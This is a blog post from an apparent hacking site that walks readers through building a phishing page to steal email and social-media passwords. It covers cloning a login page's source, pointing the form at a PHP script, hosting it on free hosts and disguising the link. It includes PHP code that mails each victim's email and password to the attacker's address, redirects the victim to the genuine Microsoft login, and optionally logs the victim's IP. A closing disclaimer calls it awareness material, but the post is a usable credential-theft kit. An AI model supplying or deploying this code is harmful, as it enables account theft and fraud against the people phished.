0
http://m14hackersworld.blogspot.com


Make a phishing page to get account information for various websites from many people
Previously i’ve posted how to hack Twitter, eBay, Gmail and Facebook account passwords using phishing. Basicly phishing is way of sending a fake page to victim which resembles the original page and ask the victim to login with the provided modified page called as phisher. This the most popular method used by hackers to hack email account passwords like myspace, gmail, yahoo, orkut, facebook, etc. Here, i will inform you the method to make a “phisher”.


How to Make Phisher to Hack E-Mail Account Passwords:
Making a phisher is very simple. You don’t have to know anything about coding. Just follow me as mentioned in below steps:
1. First of all go to the website you want to copy, and locate the login page.
2. Right click, and click on Source. Highlight all and copy onto a text document.
3. Go into the source and search for <form (Ctrl + F and search the code), when you find it look along the tag and find action=” and inside it there will be a URL, delete that url and type in login.php
4. Now you need to find where the textboxes are. To do this find a label next to one of the inputs, eg ‘E-mail address:’ Then go into the source and search for ‘E-mail address:’ then follow it along until you see <input name= “login”
Click on the image to see the full size



5. Now open up notepad and post the following code, and then follow instuctions after the //
<?php
//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = ‘ozsanchez@hotmail.co.uk’;
//Put what you want the subject to be
$subject = ‘New password found, $log_email’s email.’;
//define the message to be sent. Each line should be separated with \n
$message = “E-mail: $log_email\n\nPassword: $Password”;
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = “From: ozsanchez@hotmail.co.uk”;
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header(‘Location: https://login.live.com/ppsecure/post.srf?id=66262');
?>
6. Save it as login.php
7. Upload both files onto your website or to a free-hosting site like:
www.yourfreehosting.net
www.drivehq.com
www.110mb.com
www.t35.com
www.esmartstart.com
Good trick to make link longer is to put ‘?’ after any page and put anything after it.
You can get someones ip address by if you put at the top of the login.php file this code:
$ip_address = $_SERVER['REMOTE_ADDR']
Note: I have written this article to make you aware of how phishing is done. I am not in any way responsible for any action performed by the reader. The reader is solely responsible for his action.

Post a Comment

M14 Network Inc. | Hassnain Arts

 
Top